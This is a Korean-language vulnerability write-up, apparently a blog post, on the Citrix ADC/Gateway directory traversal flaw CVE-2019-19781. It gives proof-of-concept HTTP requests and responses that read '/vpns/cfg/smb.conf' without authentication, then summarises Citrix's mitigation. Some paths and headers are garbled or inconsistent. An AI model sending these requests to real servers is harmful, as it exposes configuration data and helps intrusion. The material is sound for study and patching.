[CVE-2019-19781] CitrixADC 및 CitrixGateway 취약점

 

💥 취약점 요약

CitrixADC 및 CitrixGateway 에서 원격 공격자는 디렉토리 통과 요청을 쉽게 보내고 사용자 인증 없이 시스템 구성 파일에서 중요한 정보를 읽고, 임의 코드를 원격으로 실행 할 수 있다. 

 Directory traversal 취약점을 이용하여 경로명을 잘못 처리할 때 발생되며 시스템 검증은 하지 않고  들어오는 요청에 직접 경로를 사용하게 된다. 

/vpn/.. 경로를 포함하여 요청하는 경우 /vpn/services.html은 Citrix 제품에서 실행되는 Apache 서버로 /vpn/..에서 경로를 변환하여 /vpns/로 간단히 진입하게 된다

/vpn/../vpns/services.html

Apache 시스템에는 해당 취약점이 있으며 이를 통해 원격 공격자는 사용자 인증 없이 디렉토리 통과요청을 이용하고 /vpns/cfg/smb.conf 와 같이 중요한 설정 파일을 액세스 할 수 있게 된다.

/vpn/../cfg/smb.conf

위 경로를 통해 공격자는 서버의 파일 시스템에서 smb.conf 파일을 읽을 수 있는데 이 파일은 리눅스 시스템에서 사용되는 파일로 samba의 설정 정보가 포함되어 있으며 공격자가 이 파일을 읽을 경우 다음과 같은 정보를 습득할 수 있다

• 공유 디렉토리 및 파일 정보
• 접근 제어 설정
• 로그 설정
• 도메인 및 작업그룹 설정

 

 

📌 공격 구문

/vpn/../vpns/services.html

Request

GET /vpn/../vpns/services.html HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macitosh; Intel Mac os x 10_13_6) ApplewebKit/537.36 ( KHTML, like Gecho)
Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-User:?
...
Accept-Language: en-Us,en;q=0.9

* PoC 요청에 대한 성공적인 응답

Response

HTTP/1.1 200 OK
Date: Fir, 10 Jan 2020
...
<HTML>
<HEAD>
<meta http-equiv="Expires" content="Sat, 1 Jan 2000 08:00:00 GMT" />
<META HTTP-EQUIV="Refresh" content="0;URL=/logon/themes/Default/homepage.html">
</HEAD>
<BODY>
</BODY>
</HTML>

 

/vpn/../vpns/cfg/smb.conf

Request

GET /vpn/../vpns/cfg/smb.conf  HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macitosh; Intel Mac os x 10_13_6) ApplewebKit/537.36 ( KHTML, like Gecho)
Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-User:?
...
Accept-Language: en-Us,en;q=0.9

* PoC 요청으로 smb.conf 파일에 성공적으로 액세스

Response

HTTP/1.1 200 OK
Date: Fir, 10 Jan 2020
...
[global]
encrypt passwords = yes
name resolve order = Imhosts wins host bcast

 

 

💡 해결방안

 Citrix는 사용자에게 특정 응답자 정책을 적용하여 공격 시도를 필터링 할 것을 권장하였다.

 Directory traversal 시도 /../ 가 포함된 요청을 차단하고 /techniquesns/ 디렉토리에 엑세스 하려는 요청도 차단하는 기술을 적용하고 있다.